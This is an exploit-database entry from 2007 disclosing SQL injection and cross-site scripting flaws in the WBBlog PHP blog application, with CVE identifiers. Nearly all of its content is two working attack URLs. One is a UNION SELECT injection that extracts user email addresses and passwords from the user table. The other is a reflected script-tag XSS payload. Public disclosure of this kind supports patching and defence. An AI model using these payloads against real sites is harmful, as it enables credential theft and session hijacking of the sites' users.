wbblog - Cross-Site Scripting / SQL Injection

Author: Mehmet Ince
type: webapps
platform: php
port: 
date_added: 2007-03-14 
date_updated:  
verified: 1 
codes: OSVDB-34183;CVE-2007-1482;OSVDB-34182;CVE-2007-1481 
tags: 
aliases:  
screenshot_url:  
application_url: 

======================x=o=r=o=n=====================

WBBlog (XSS/SQL) Multiple Remote Vulnerabilities

======================x=o=r=o=n=====================

Bulan: xoron

xoron.biz

======================x=o=r=o=n=====================

SQL INJ:

index.php?cmd=viewentry&e_id=-1/**/UNION/**/SELECT/**/null,null,u_email,null,u_password,null/**/FROM/**/user/*

XSS :

index.php?cmd=viewentry&e_id="><script>alert('HACKED')</script>

======================x=o=r=o=n=====================

Vendor Site: http://liqua.com/wbblog.html

======================x=o=r=o=n=====================

Thnx: pang0

======================x=o=r=o=n=====================

# milw0rm.com [2007-03-15]